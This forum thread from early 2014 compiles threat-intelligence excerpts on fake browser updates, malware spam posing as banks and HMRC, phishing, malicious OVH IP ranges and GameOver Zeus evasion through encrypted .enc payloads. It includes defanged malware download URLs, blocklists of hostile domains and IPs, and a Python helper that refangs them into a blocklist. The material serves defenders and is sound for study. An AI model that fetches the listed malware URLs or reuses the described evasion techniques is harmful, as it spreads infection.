- http://blog.malwarebytes.org/fraud-scam/2014/01/dont-fall-for-fake-browser-update-warnings/
Jan 28, 2014 - "... Any message asking end users to update browsers to ward off security issues can cause problems both at home and in the workplace. Neither “Relative who knows about computers” nor the stressed IT guy from the fourth floor wants to waste time rolling back / uninstalling / deleting things from the target PC... I came across a fake browser update site doing the rounds located at
newbrowserversion(dot)org
which has pages for Chrome (C), Firefox (F) and IE (I) users... Here’s what you can expect to see on each of the three pages.
Chrome: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/browsupdate2.jpg
Firefox: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/browsupdate3.jpg
IE: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/browsupdate4.jpg
Regardless of page viewed, they all say the same thing... Should the end-user run the executable file (and all three have a different MD5) the install procedure kicks into gear. Sort of. We’re presented with the standard splash screen, and one would expect to see various offers, programs, maybe the odd toolbar... If you want to check the update status of your browser, rely on the browser itself rather than third-party websites offering up random downloads. More often than not, your browser will tell you about updates by clicking into “Help” and / or “About this browser” options in the various settings menus..."

68.233.240.26
- https://www.virustotal.com/en/ip-address/68.233.240.26/information/

:mad: :mad:

AplusWebMaster
2014-01-30, 13:15
FYI...

Fake Vodafone MMS SPAM - malicious attachment
- http://blog.dynamoo.com/2014/01/fake-vodafone-mms-spam-comes-with.html
30 Jan 2014 - "This -fake- Vodafone MMS spam comes with a nasty payload:
Date: Thu, 30 Jan 2014 03:55:04 -0500 [03:55:04 EST]
From: mms.service6885@ mms .Vodafone .co .uk
Subject: image Id 312109638-PicOS97F TYPE==MMS
Received from: 447219637920 | TYPE=MMS

Despite the Vodafone references in the header, this message comes from a random -infected- PC somewhere and not the Vodafone network. The email doesn't quite render properly in my sample:
> https://lh3.ggpht.com/-PSCY3ZpjEqc/Uuod0tnNmZI/AAAAAAAACeM/xFBm1YwPsAc/s1600/vodafone-mms.png
The spam is probably preying on the fact that most people have heard of MMS but very rarely use it. Attached is a file IMG0000008849902.zip which in turn contains a malicious executable IMG0000008849902.exe; this has a VirusTotal detection rate of just 2/50*. Automated analysis tools are inconclusive... as the sample appears to time out."
* https://www.virustotal.com/en-gb/file/971f2effb1e8b462a449d82c2660a8536ab113b0bb0fd1938591d4703a47809e/analysis/1391073258/
___

Twitter Follower Scam ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/does-the-twitter-follower-scam-actually-work/
Jan 30 2014 - "... This -scam- tries to attract potential victims by using tweets with the phrase “GET MORE F0LL0WERS” and a URL that is apparently from Google. (In this particular case, Google is just used as a -redirector- to the scammer’s site.) It also uses Twitter’s Discover feature and trending topics to boost its visibility. It also uses tweets that mention random Twitter users.
Sample tweets promoting the site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/twitter1.jpg
When users click the link in the post, they will be redirected to a “get free followers” site. The site offers two options—a free and a premium service. The free option requires users to authorize a Twitter app named “LAAY PAAY” created by the scammers; this will grant them access to the user’s Twitter account. After the user is returned to the scam site from the app authorization process, the site will show a “processing” page. The user will gain random Twitter followers, including those with private accounts. The premium service boasts new followers per minute, no ads, and instant activation. This service costs five euros and can be paid via PayPal.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/twitter2.jpg
What’s the catch? Yes, they get new followers, but these followers are other users who signed up for this service as well. By agreeing to the service, their accounts will also be used to follow other accounts as well. In addition, spam tweets will also be sent from the victim’s Twitter account. Even paying five euros will not stop these spam tweets. Note that to get more followers you have to log in repeatedly (otherwise you drop off the “list”), repeating the whole cycle... Gaining access to Twitter accounts and sending spam tweets is not the only goal of the scammers here. They also load various advertising-laden affiliate sites in the background, in order to gain pageviews and thus, revenue for the owners of the ads. We’ve seen -35- separate domains in this attack... Users are encouraged to -avoid- clicking links on social media posts unless the source can be verified. Users should also avoid giving access to their social media accounts unless the sites are established and well-known. Lastly, they should always remember that “free” services often aren’t. They may ask for something in exchange, be it information or access to accounts..."
___

s15443877[.]onlinehome-server[.]info ? ...
- http://blog.dynamoo.com/2014/01/wtf-is-s15443877onlinehome-serverinfo.html
30 Jan 2014 - "Something that caught my eye was this Google Safebrowsing diagnostic for [donotclick]s15443877.onlinehome-server .info * ... Not only are (exactly) one third of the pages crawled hosting -malware- but there are a staggering -198- domains spreading it. Usually it's just a handful of sites, but this is the most I've ever seen. VirusTotal also shows some historical evil** going on with the IP of 212.227.141.247 (1&1, Germany) and a Google of the site contents shows thousands of hits of what appears to be scraped content in Spanish. It's hard to say just what this site is, but with Google diagnostics like that then it is unlikely to be anything good and -blocking- s15443877.onlinehome-server .info or 212.227.141.247 might be prudent."
* http://www.google.com/safebrowsing/diagnostic?site=s15443877.onlinehome-server.info/
"... over the past 90 days, 582 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2014-01-29, and the last time suspicious content was found on this site was on 2014-01-29. Malicious software includes 166 scripting exploit(s), 166 trojan(s), 89 exploit(s). Successful infection resulted in an average of 5 new process(es) on the target machine. Malicious software is hosted on 198 domain(s)... 155 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site..."

** https://www.virustotal.com/en-gb/ip-address/212.227.141.247/information/

AS8560 (ONEANDONE-AS)
- http://www.google.com/safebrowsing/diagnostic?site=AS:8560
___

Fake "Last Month Remit" SPAM
- http://blog.dynamoo.com/2014/01/last-month-remit-spam.html
30 Jan 2014 - "This -fake- "Last Month Remit" spam does a pretty good job of looking like it comes from your own organisation..
Date: Thu, 30 Jan 2014 12:22:05 +0000 [07:22:05 EST]
From: Administrator [victimdomain]
Subject: FW: Last Month Remit
File Validity: Thu, 30 Jan 2014 12:22:05 +0000
Company : http ://[victimdomain]
File Format: Office - Excel
Internal Name: Remit File
Legal Copyright: Microsoft Corporation. All rights reserved.
Original Filename: Last month remit file.xls ...

Going to the bother of inserting fake mail headers is odd, because anyone who knew enough to check the headers would probably also realise that the attached ZIP file with an EXE in it was probably bad news. In this case, the attachment is called Remit_[victimdomain].zip which in turn contains a malicious executable called Remit.exe which has an icon that makes it look like a PDF file.
> https://lh3.ggpht.com/-BiMee-Y7Kt4/UupYcxBdSgI/AAAAAAAACe0/qYuzePEaT1Y/s1600/remit2.png
This file has a VirusTotal detection rate of 10/49*. Automated analysis tools... show an attempted connection to poragdas .com on 182.18.143.140 (Pioneer Elabs, India) which is a server that has been seen before, and excelbizsolutions .com on 103.13.99.167 (CtrlS Private, India).
Recommended blocklist:
103.13.99.167
182.18.143.140
poragdas .com
excelbizsolutions .com "
* https://www.virustotal.com/en-gb/file/7ff43c5448b8edf9f0f373e56709a24719f0a972b381accf76a0f1fa0c324542/analysis/1391089282/

:mad: :fear::fear:

AplusWebMaster
2014-01-31, 15:08
FYI...

Fake Fax2Email SPAM
- http://blog.dynamoo.com/2014/01/windsor-telecom-fax2email-spam.html
31 Jan 2014 - "... another -fake- Fax spam with a malicious payload:
Date: Fri, 31 Jan 2014 10:00:23 +0000 [05:00:23 EST]
From: Windsor Telecom Fax2Email [no-reply@ windsor-telecom .co .uk]
Subject: Fax Message on 08983092722 from FAX MESSAGE
You have received a fax on your fax number: 08983092722 from.
The fax is attached to this email.
PLEASE DO NOT REPLY BACK TO THIS MESSAGE.

Attached is an archive file FAX MESSAGE.ZIP which in turn contains a malicious executable FAX MESSAGE.EXE with a VirusTotal detection rate of 4/50*. Well, I say malicious but both Malwr and Anubis report that the payload does not execute properly, however that might just be an issue with those particular sandboxes and it does -not- mean that it will fail to run on all systems."
* https://www.virustotal.com/en-gb/file/bd18f9369b8e8f7e17f421d07b510c2268a64e0dcd881610f323ea9018120822/analysis/1391163988/
___

Something evil on 192.95.10.208/28
- http://blog.dynamoo.com/2014/01/something-evil-on-192951020828.html
31 Jan 2014 - "192.95.10.208/28 (OVH, Canada) is being used to deliver -exploit- kits utilising .pw domains, for an example see this URLquery report*. The following domains are being used in these attacks (although there may be more):
(Long list at the dynamoo URL above.)
The IP forms part of a /28 block belonging to a known bad actor:
NetRange: 192.95.10.208 - 192.95.10.223
CIDR: 192.95.10.208/28
OriginAS: AS16276 ... **
Country: RU
RegDate: 2014-01-24
I believe that these IPs are connected with a black hat host -r5x .org- and IPs with these WHOIS details are very often used in exploit kit attacks. I would -strongly- recommend that you -block- 192.95.10.208/28 in addition to the domains listed above."
* http://urlquery.net/report.php?id=9140970

Diagnostic page for AS16276 (OVH)
** http://google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 5074 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-01-31, and the last time suspicious content was found was on 2014-01-31... we found 776 site(s) on this network... that appeared to function as intermediaries for the infection of 2156 other site(s)... We found 1092 site(s)... that infected 7551 other site(s)..."

- http://centralops.net/co/DomainDossier.aspx
canonical name r5x .org ...
addresses 176.124.111.130 ...
- https://www.virustotal.com/en-gb/ip-address/176.124.111.130/information/
___

Lloyds Banking Group 'Online Access Suspended' Phish
- http://www.hoax-slayer.com/lloyds-online-access-suspended-phishing-scam.shtml
Jan 31, 2014 - "Email that pretends to come from Lloyds Banking Group -claims- that the recipient's online account access has been suspended because login details are incorrectly entered several times... The email is -not- from Lloyds. It is a -phishing- scam designed to trick users into giving their account login details and other personal information to Internet criminals. Example:
> http://www.hoax-slayer.com/images/llyods-phishing-scam-2014.1.jpg
... According to this email, which purports to be from the UK's Lloyds Bank, the recipient's bank account has been suspended. Supposedly, account login details were entered several times, so the bank suspended access in order to protect the customer from online fraud attempts... the email itself is the online fraud attempt. The message is a typical phishing scam. Customers who are taken in by the false claims and click the link as instructed will be taken to a fake website where they will be asked to login to their Lloyds online account. After logging in on what they believe is the genuine Lloyds website, victims may then be asked to provide further personal data such as their credit card details and ID information. At the end of the sequence, victims may be automatically redirected to the genuine Lloyds website. Meanwhile, the criminals can hijack their bank accounts, transfer funds, conduct fraudulent transactions and perhaps even steal their identities..."
- http://www.lloydsbank.com/help-guidance/security/phishing.asp

:fear: :mad:

AplusWebMaster
2014-02-01, 17:48
FYI...

Fake Human Rights SCAM/SPAM ...
- http://blog.dynamoo.com/2014/02/african-human-right-and-refugees.html
1 Feb 2014 - "This spam email is actually part of an advanced fee fraud setup:
From: fernando derossi fernandderossi59@ gmail .com
To: fernandderossi59@ gmail .com
Date: 1 February 2014 13:22
Subject: URGENT FOOD STUFF SUPPLY NEED FOR REFUGEES
Signed by: gmail .com
Dear Sir:
My company has been mandated to look for a company capable of
supplying food stuffs product listed bellow by the AFRICAN HUMAN
RIGHT AND REFUGEES PROTECTION COUNCIL (AHRRPC) for assisting of the
refugee within the war affected countries IN middle east and Africa
like MALI,SYRIA, SOMALIA, CENTRAL AFRICA, and SOUTH SUDAN, which after
going through your company's profile, have decided to know if your company is interested.
Below are the list of food Stuffs and the targeted value needed by (AHRRPC) ...
We will be happy to work with you company only as representing agent
to secure an allocation for your company while in return your company
will give us comission as soon as your receive your contract value. We
will give you more details about the contract when we recieve your reply.
Regards,
Mr.Fernando Derossi
AHRRPC AGENT ...

The email links to a website at www .ahrrpc .8k .com which set off all sorts of -alarms- on my virus scanner, but I think it is just an ad-laden free web hosting site, and purports to be from the African Human Right and Refugees Protection Council (AHRRPC)...
> https://lh3.ggpht.com/-rmNQq0bAL6I/Uu0I-IzIiOI/AAAAAAAACfQ/jt3zycfz6Oo/s1600/ahrrpc.png
Of course, there is no such organisation as this and probably the main thrust of the scam is that there will be an "arrangement fee" payable in order to sell these goods.. and once the fee is paid the scammers will disappear... Give any approaches from the so-called African Human Right and Refugees Protection Council (AHRRPC) a very wide berth. And remember, if you want to verify who a photo actually belongs to then Google Images is an excellent resource."
___

Fake SMS SPAM ...
- http://blog.dynamoo.com/2014/02/unsure-if-you-qualify-for-refund-of-ppi.html
1 Feb 2014 - "... scammers are still at it, pumping away lead generation spam to persuade people to make PPI claims to which they are -not- entitled.

Unsure if you qualify for a refund of PPI paid on a loan or credit card? Reply PPI and we will run a no obligation check or reply STOP to opt out.
TPPCO

In this case the scammers used the contact number +447743623103 but they burn through dozens of SIM cards every day with their illegal spamming operations. If you get one of these, you should forward the spam and the sender's number to your carrier... T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints. You can also report persistent spam like this via the ICO's page on the subject*. With any luck these spammers will end up on the receiving end of a massive fine**."
* http://ico.org.uk/for_the_public/topic_specific_guides/marketing/texts

** http://blog.dynamoo.com/2012/11/gary-mcneish-christopher-niebel-fined.html

:fear::fear: :mad:

AplusWebMaster
2014-02-03, 14:57
FYI...

Something evil on 192.95.7.224/28
- http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html
3 Feb 2014 - "Another OVH Canada range hosting criminal activity, 192.95.7.224/28 is being used for several malicious .pw domains being used to distribute malware (as used in this attack*). The malware domains seem to rotate through subdomains very quickly, possibly in an attempt to block analysis of their payload. This block is carrying out the same malicious activity that I wrote about a few days ago**. OVH have suballocated this IP block to an entity that I believe is connected with black hat host r5x .org.
CustName: Private Customer
Address: Private Residence
City: Penziatki ...
Country: RU
RegDate: 2014-01-24 ...
These IPs are particularly active:
192.95.7.232
192.95.7.233
192.95.7.234
There is nothing of value in this /28 block and I recommend that you -block- the entire IP range plus the following domains (which are all already flagged as being malicious by Google)
Recommended blocklist:
192.95.7.224/28
archerbocce .pw
athleticsmove .pw .."
(Long list of .pw domains at the dynamoo URL above.)
* http://urlquery.net/report.php?id=9205587

** http://blog.dynamoo.com/2014/01/something-evil-on-192951020828.html

- https://www.virustotal.com/en/ip-address/192.95.7.232/information/
___

Something evil on 64.120.137.32/27
- http://blog.dynamoo.com/2014/02/something-evil-on-641201373227.html
3 Feb 2014 - "64.120.137.32/27 is a range of IP addresses belonging to Network Operations Center Inc in the US and suballocated to a customer which is currently being used in malware attacks as an intermediate step in sending victims to this malicious OVH range*. You can see an example of some of the badness in action here**. The range was formerly used by a company called TixDepot but may have been hijacked or reassigned. NOC report the following contact details for the block:
network:ID:NET-64.120.137.32/27
network:Auth-Area:64.120.128.0/17
network:network:NET-64.120.137.32/27
network:block:64.120.137.32/27 ...
network:country: US ...
About -half- the domains in this /27 have been flagged as -malicious- by Google, concentrated on the three IP addresses:
64.120.137.53
64.120.137.55
64.120.137.56
I would recommend -blocking- the entire /27, but this is the breakdown by IP address with domains tagged by Google highlighted (there's a plain list here***)"
* http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html

** http://urlquery.net/report.php?id=9196650

*** http://pastebin.com/hHGvXkJa

- https://www.virustotal.com/en/ip-address/64.120.137.53/information/

- https://www.virustotal.com/en/ip-address/64.120.137.55/information/

- https://www.virustotal.com/en/ip-address/64.120.137.56/information/
___

Something evil on 192.95.43.160/28
- http://blog.dynamoo.com/2014/02/something-evil-on-192954316028.html
3 Feb 2014 - "More badness hosted by OVH Canada, this time 192.95.43.160/28 which contains pretty much the same set of evil described here*. Here is a typical IP flagged by VirusTotal** and a failed resolution by URLquery*** which frankly gives enough information to make it suspicious. However, the key thing is the registrant details which have been used in -many- malware attacks before****.
CustName: Private Customer
Address: Private Residence
Country: RU
RegDate: 2014-01-24...
I can see the following .pw domains active in this range:
basecoach .pw
crewcloud .pw
boomerangfair .pw
kickballmonsoon .pw
martialartsclub .pw
runningracer .pw
All those domains are flagged by Google as malicious and I recommend that you block them along with 192.95.43.160/28."
* http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html

** https://www.virustotal.com/en-gb/ip-address/192.95.43.160/information/

*** http://urlquery.net/report.php?id=9209750

**** http://blog.dynamoo.com/search?q=Penziatki
___

Fake inTuit/TurboTax/IRS Refund Notice
- http://security.intuit.com/alert.php?a=97
2/3/14 - "People are receiving -fake- emails with the title "IRS Refund Notice":
Screenshot: http://security.intuit.com/images/phish97_tt_refund.jpg
This is the end of the -fake- email.
Steps to Take Now:
Do -not- open the attachment in the email.
-Delete- the email..."
___

German email accounts hacked - Scams circulate ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/scams-circulate-after-german-email-accounts-get-hacked/
Feb 3, 2014 - "Recently, the German Federal Office for Information Security disclosed that the email accounts of up to 16 million users had been compromised. The computers of these users were infected with information-stealing malware which was used to steal these login credentials. The German government has set up a page where users can check if their email accounts have been compromised*. We recommend that users in Germany check their accounts, as we’re seeing a re-occurrence of certain -scams- which rely on compromised email accounts...
Protecting email accounts should be a top priority, considering the amount of sensitive information stored in them and the other accounts that can be controlled via password resets. Users should remember a few key safety tips:
• Always use different complex passwords or passphrases for different accounts. Password managers can help create and manage multiple online accounts.
• Opt for two-factor authentication when possible.
• Only log in using secure and trusted devices. Think twice before logging in from public devices such as Internet cafes.
• Users can also opt for encryption services for added protection."
* https://www.sicherheitstest.bsi.de/
___

ANZ 'Upgrade to New System' Phish ...
- http://www.hoax-slayer.com/anz-upgrade-new-system-phishing-scam.shtml
Feb 3, 2014 - "Email pretending to be from large Australian and New Zealand bank ANZ claims that customers must click a link to upgrade to a new system technology designed to give users maximum protection... The email is a phishing scam that tries to trick users into divulging their personal information to criminals. The "Log on" button opens a -bogus- website designed to steal the user's ANZ account login details...
> http://www.hoax-slayer.com/images/anz-upgrade-phishing-2014-1.jpg
According to this email, which purports to be from the ANZ bank, customers are required to upgrade to a new system by logging into their accounts. The message claims that the new system will offer maximum protection and invites users to click a "Log on" button. The email is formatted with ANZ's logo and colour scheme to make it appear more genuine... the message is -not- from ANZ and the claim that users must login due to a system upgrade is untrue. The email is a simple phishing scam designed to grab account login credentials from unsuspecting ANZ customers... If users enter their customer number and password on the fake page and click the "Log on" button, they will be automatically redirected to the genuine ANZ site. They may believe that they have successfully "upgraded" to the new system and may remain unaware that they have been scammed until the next time they try to login... ANZ has published information about phishing scams on its website*..."
* http://www.anz.com/auxiliary/security-centre/fraud-security-centre/protect-yourself/identifying-fraud/internet-fraud/
___

Fake Evernote - Malware Email
- http://www.hoax-slayer.com/evernote-image-sent-malware-email.shtml
Feb 2, 2014 - "Email purporting to be from note taking application Evernote claims that an image has been sent and invites users to click a link to view the image... Evernote did not send the email and has no connection to it. The message is a criminal ruse designed to trick people into downloading and installing malware...
> http://www.hoax-slayer.com/images/evernote-image-malware-1.jpg
According to this email, which purports to be from popular note taking application Evernote, an image addressed to the recipient has been sent. The message includes a clickable "Go to Evernote" button. The name of the supposed image is also clickable. However, Evernote did not send the email. Nor did it send an image as claimed. Clicking the links in the message will not open an image stored in Evernote as suggested in the message. Both links lead to a compromised website that harbours -malware-..."

:mad: :mad:
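The dynamoo posts above (the s15443877 write-up, the "Last Month Remit" blocklist and the three "Something evil" ranges) publish their indicators defanged (a space before the dot, "[.]", or a "[donotclick]" prefix) and mix single IPs, CIDR ranges and domains. The Python below is an added example, not code from dynamoo or any quoted blog: it refangs such a list into a blocklist and answers whether an address or hostname falls inside it. The indicator values are copied from the posts; the function and class names are my own.

```python
"""Normalise defanged indicators from the write-ups above into a usable blocklist.

Added example; not code from the dynamoo posts or any quoted blog. The indicator
values below are copied from the posts (in their defanged form); the helper
names are my own.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample list, using the defanging styles seen in the posts above:
# "name .tld" with a space, "[.]", a "[donotclick]" prefix, plain IPs and CIDRs.
SAMPLE_INDICATORS = [
    "192.95.7.224/28",
    "103.13.99.167",
    "poragdas .com",
    "excelbizsolutions .com",
    "s15443877[.]onlinehome-server[.]info",
    "[donotclick]kitchenrescue .com",
    "mms .Vodafone .co .uk",
]

_STRIP_PREFIXES = ("[donotclick]", "hxxps://", "hxxp://", "https://", "http://")


def refang(indicator: str) -> str:
    """Return a defanged indicator as a plain lowercase IP, CIDR or hostname."""
    s = indicator.strip()
    for prefix in _STRIP_PREFIXES:
        if s.lower().startswith(prefix):
            s = s[len(prefix):]
            break
    s = s.replace("[.]", ".").replace("(dot)", ".")
    s = re.sub(r"\s*\.\s*", ".", s)      # "poragdas .com" -> "poragdas.com"
    return s.lower().strip("./")


@dataclass
class Blocklist:
    """IP networks (single hosts become /32) plus exact-or-suffix domain matches."""
    networks: list = field(default_factory=list)
    domains: set = field(default_factory=set)

    def add(self, indicator: str) -> None:
        value = refang(indicator)
        try:
            self.networks.append(ipaddress.ip_network(value, strict=False))
        except ValueError:
            self.domains.add(value)

    def is_blocked(self, target: str) -> bool:
        """True if target is an address inside a listed range, or a listed domain / subdomain."""
        value = refang(target)
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            labels = value.split(".")
            # Match the domain itself and any parent listed in the blocklist,
            # so www.poragdas.com is caught by the entry poragdas.com.
            return any(".".join(labels[i:]) in self.domains for i in range(len(labels)))
        return any(addr in net for net in self.networks)


def build_blocklist(indicators=SAMPLE_INDICATORS) -> Blocklist:
    bl = Blocklist()
    for ind in indicators:
        bl.add(ind)
    return bl


if __name__ == "__main__":
    bl = build_blocklist()
    for probe in ("192.95.7.233", "192.95.7.240", "www.poragdas.com", "example.com"):
        print(f"{probe:28} blocked={bl.is_blocked(probe)}")
```

Feeding proxy or DNS logs through `is_blocked` is enough to turn a post like "I recommend that you block the entire /28" into an alert; single hosts are stored as /32 networks so the same membership test covers both.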

AplusWebMaster
2014-02-04, 13:08
FYI...

GameOver Zeus now using Encryption to bypass detection
- http://threatpost.com/gameover-zeus-now-using-encryption-to-bypass-detection/104019
Feb 3, 2014 - "Cybercriminals have begun to tweak the way the GameOver Zeus Trojan is being delivered to users’ machines, making it easier for the banking malware to evade detection and steal victims’ credentials. To get the job done the malware has been working in tandem with the malware Upatre. For about a week now criminals have been changing the .exe files Upatre downloads to non-executable .enc files. According to a computer forensics expert, this is how the malware, which spreads via spam e-mails and malicious attachments, can avoid being spotted by firewalls, Web filters and other security defenses. Gary Warner, a director of research in computer forensics at the University of Alabama at Birmingham posted* about the trick and included a handful of spam email examples on his Cybercrime & Doing Time blog yesterday... Warner noticed the trend when a colleague, Brendan Griffin, a malware analyst at the firm Malcovery sent along a series of -spam- messages, some purporting to come from the Better Business Bureau, Skype and the IRS, among other agencies, spreading the malware..."
* http://garwarner.blogspot.com/2014/02/gameover-zeus-now-uses-encryption-to.html

- https://www.virustotal.com/en/file/06c56ba2c25e2a998876b83a3ede7fb3273f9f9eb8aff1365955ba4d8d72fee8/analysis/
File name: vti-rescan
Detection ratio: 0/50
Analysis date: 2014-02-05

- https://slashdot.org/topic/datacenter/stop-botnets-by-knowing-a-zombie-from-a-user/
Feb 4, 2014 - "... The newest version of the GameOver Zeus variant slipped through -50- anti-virus filters at online anti-virus service VirusTotal by encrypting its malicious payload and changing the name to make it look inert, according to security researcher Gary Warner at Malcovery, who blogged about it Feb. 2. “Why? Well, because technically, it isn’t malware. It doesn’t actually execute!” Warner wrote*. “All Windows EXE files start with the bytes “MZ”. These files start with “ZZP”. They aren’t executable, so how could they be malware? Except they are.” Rather than launching its own malicious payload, the attachment downloads an encrypted file ending in .enc, then decrypts it, renames it and stores the new payload somewhere else on the infected machine – as an executable scheduled to launch sometime later. It was easier when botnets used IRC to control malware-infected zombies, but the state of the art is now to use TCP and HTTP, which helps botnets hide their tracks among gigabytes of legitimate HTTP traffic..."

- http://www.fortiguard.com/legacy/analysis/zeusanalysis.html
___

Email malware at 5-year high - Jan 2014
- http://blogs.appriver.com/Blog/bid/101194/January-in-Review
Feb 3, 2014 - "... a few metrics that we saw in January:
> http://blogs.appriver.com/Portals/53864/images/virus_traffic-resized-600.jpg
Though traffic was close to normal, the four-day -spike- from the 7th-10th was enough to push this month’s total virus message count to the highest monthly total since Q3 of 2008. (269,108,311 virus-laden messages were quarantined in January 2014.) The traffic on Jan. 7th-10th was roughly -40- times the daily average, which is typically about 2+ million emails containing a virus attachment..."

:fear::fear: :mad:

AplusWebMaster
2014-02-05, 12:32
FYI...

Fake Barclays transaction SPAM
- http://blog.dynamoo.com/2014/02/barclays-transaction-notification-spam.html
5 Feb 2014 - "This -fake- Barclays spam comes with a malicious payload:
Date: Wed, 5 Feb 2014 03:02:52 -0500 [03:02:52 EST]
From: Barclays Bank [support@ barclays .net]
Subject: Barclays transaction notification #002601
Transaction is completed. £9685 has been successfully transfered.
If the transaction was made by mistake please contact our customer service.
Receipt of payment is attached.
Barclays is a trading name of Barclays Bank PLC and its subsidiaries. Barclays Bank PLC is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority (Financial Services Register No. 122702). Registered in England. Registered Number is 1026167 with registered office at 1 Churchill Place, London E14 5HP.

Attached is a file Payment receipt Barclays PA77392733.zip which in turn contains a malicious executable Payment receipt Barclays PA77392733.exe with a surprisingly poor VirusTotal detection rate of just 1/51* (only Sophos detects it). Automated analysis tools are pretty inconclusive about the payload... with only the Malwr report** having any real detail."
* https://www.virustotal.com/en-gb/file/26b592c1954cedcb25592a50cff632f5e7633c579137099fb532083d3fab652a/analysis/1391591290/

** https://malwr.com/analysis/OGIzYjYzNTQ1ZTJjNDRjYmJlZjZlMjdkMGRlOTc5ODI/
___

Hacked Within Minutes: Sochi Visitors Face Internet Minefield
- http://www.nbcnews.com/watch/nightly-news/hacked-within-minutes-sochi-visitors-face-internet-minefield-137647171983
Feb 4, 2014 - "... they should have “no expectation of privacy,” even in their hotel rooms."
___

Fake "LloydsLink reference" SPAM - malicious attachment
- http://blog.dynamoo.com/2014/02/lloydslink-reference-spam-comes-with.html
5 Feb 2014 - "This -fake- Lloyds TSB spam comes with a malicious payload:
Date: Wed, 5 Feb 2014 20:38:29 +0100 [14:38:29 EST]
From: GRP Lloydslink Tech [GRPLloydslinkTech@ LLOYDSBANKING .COM]
Subject: LloydsLink reference: 8255820 follow up email and actions to be taken
Lloyds TSB
Help
(New users may need to verify their email address)
If you do not see or cannot click / tap the Download attachment button:
Desktop Users:
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
Mobile Users:
Install the mobile application.
Protected by the Voltage SecureMail Cloud
SecureMail has a NEW LOOK to better support mobile devices!
Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender.
Email Security Powered by Voltage IBE™
Copyright 2002-2014 Voltage Security, Inc. All rights reserved.
Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales no. 2065. Telephone 0207626 1500
Bank of Scotland plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC327000. Telephone: 08457 21 31 41 ...

Screenshot: https://lh3.ggpht.com/-WflKBnC4NEw/UvJmkiBZelI/AAAAAAAACi8/Sy4OOq0bzG0/s1600/lloyds-tsb.png

The attachment is SecureMessage.zip which in turn contains a malicious executable SecureMessage.scr which has an icon that looks like Internet Explorer. Despite the .scr suffix, this file is a plain old .exe file and will execute if you double-click it (-don't!-). VirusTotal detections are 11/51*, and automated analysis... show an attempted download from [donotclick]asianfarm .org/images/pdf.enc and [donotclick]ideasempurna .com .my/wp-content/uploads/2014/02/pdf.enc with the following IPs being involved:
108.90.186.161 (AT&T, US)
111.90.133.246 (Piradius Net, Malaysia)
121.117.209.51 (NTT, Japan)
124.217.241.34 (Piradius Net, Malaysia)
174.103.25.199 (Time Warner Cable, US)
The .enc file is an encoded executable, explained in detail here**. I haven't tried to decode it but obviously that too will be malicious."
Recommended blocklist:
asianfarm .org
ideasempurna .com .my
108.90.186.161
111.90.133.246
121.117.209.51
124.217.241.34
174.103.25.199 "
* https://www.virustotal.com/en-gb/file/e27d1c5587206b31d7f639ef7eb890ae694e20c5bee1b3ff30a99503624c0af6/analysis/1391616188/

** http://blog.crysys.hu/2014/02/gameover-zeus-now-uses-encryption-to-bypass-perimeter-security-enc-encryption/
___

Malware uses ZWS compression for evasion tactic
- http://blog.trendmicro.com/trendlabs-security-intelligence/malware-uses-zws-compression-for-evasion-tactic/
Feb 5, 2013 - "... We have seen many instances wherein malware came equipped with improved evasion techniques, such as preventing execution of analysis tools, hiding from debuggers, blending in with normal network traffic, along with various JavaScript techniques. Security researchers have now come across malware that uses a legitimate compression technique to go unnoticed by security solutions. This malware, detected as TROJ_SHELLCOD.A, is an exploit that targets an Adobe Flash Player vulnerability (CVE-2013-5331). The malware is a document file with an embedded Flash file, which has been compressed using ZWS. Released in 2011, ZWS uses the Lempel-Ziv-Markov Algorithm (LZMA) to compress data with no data loss... Typically, malware is often downloaded and executed, which means a physical copy of the malware is dropped in the infected machine. This allows security solutions to detect the malware. However, this particular malware allots memory using VirtualAlloc and executes it, acting like a backdoor. Doing so makes it harder to trace the routines of the malware as there is no physically dropped file; instead the payload is copied directly into memory. This is the reason why this malware is able to evade most security solutions, even those that support ZWS compression. We urge users to regularly install security updates as soon as they are made available. These patches can mean the difference between protection and infection. For example, the vulnerability used in this attack was patched by Adobe in December 2013..."

:fear: :mad:

AplusWebMaster
2014-02-06, 15:16
FYI...

Fake HMRC "VAT Return" SPAM
- http://blog.dynamoo.com/2014/02/fake-hmrc-vat-return-spam.html
6 Feb 2014 - "This -fake- HMRC spam comes with a malicious attachment:
Date: Thu, 6 Feb 2014 20:32:34 +0100 [14:32:34 EST]
From: "noreply@ hmrc .gov .uk" [noreply@ hmrc .gov .uk]
Subject: Successful Receipt of Online Submission for Reference 3608005
Thank you for sending your VAT Return online. The submission for reference 3608005 was
successfully received on Thu, 6 Feb 2014 20:32:34 +0100 and is being processed. Make VAT
Returns is just one of the many online services we offer that can save you time and
paperwork.
For the latest information on your VAT Return please open attached report.
The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Cable&Wireless Worldwide in partnership with
MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was
certified virus free...

